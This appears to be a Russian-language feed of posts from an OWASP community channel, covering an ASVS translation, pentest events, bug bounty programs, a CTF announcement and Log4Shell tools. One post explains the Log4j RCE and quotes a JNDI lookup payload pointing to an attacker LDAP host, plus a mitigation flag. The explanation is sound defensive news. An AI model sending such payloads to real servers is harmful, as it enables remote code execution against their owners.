OWASP RU

2022-07-27 21:32:26 https://github.com/OWASP/ASVS/blob/master/4.0/OWASP%20Application%20Security%20Verification%20Standard%204.0.3-ru.pdf за адаптацию и перевод спасибо Андрею Титову Открыть/Комментировать

2022-05-27 10:50:19 ​​В 11.00 стартует мероприятие "«Правильный» пентест — мы выбираем, нас выбирают", успейте зарегистрироваться и принять участие.

Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки. Открыть/Комментировать

2021-12-12 09:36:42 https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/ Открыть/Комментировать

2021-12-10 15:06:11 Log4j2 RCE Passive Scanner plugin for BurpSuite

https://github.com/whwlsfb/Log4j2Scan Открыть/Комментировать

2021-12-10 14:07:58 У половины интернета нашли выполнение произвольного кода через Log4j.

Выглядит это так:

1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта). Открыть/Комментировать

2021-09-03 20:23:38 Охота за уязвимостями на ДЭГ-2021
https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг. Открыть/Комментировать

2021-08-10 13:19:46 YauzaCTF 2021 is a task-based competition that will take place online on August 27-29 at 12:00 (UTC+0).

It will give the participants the atmosphere of the Soviet past.

For 48 hours, participants will be able to solve tasks of all categories:

- web, reverse, pwn, forensics, crypto, OSINT, joy.

Also new categories have been added:

- hardware, pentest and emulation!

The organizers and sponsors of the event have prepared many interesting prizes. More details on the event website.

ABOUT EVENT:

Event website: https://yauzactf.com/en
CTFtime page: https://ctftime.org/event/1417/
Competition type: task-based competition
Start: on August 27 at 12:00 (UTC+0)
Duration: 48 hours
Number of people in the team: maximum 7 people
Qualification: students from CIS schools or universities (graduating not earlier than 2021) and those, who born not earlier than 1995 Открыть/Комментировать

2021-08-10 13:04:09 ИБ ДИТ Правительства Москвы:
https://www.mos.ru/security.txt Открыть/Комментировать

2021-08-06 09:05:52 Правильный подход к безопасности:
https://www.gosuslugi.ru/security.txt Открыть/Комментировать

2021-07-27 23:54:15 Google запускает общую платформу для взаимодействия с багхантерами во всех продуктах компании: https://bughunters.google.com. Также доступен Университет бахгантеров для повышения скиллов: https://bughunters.google.com/learn Открыть/Комментировать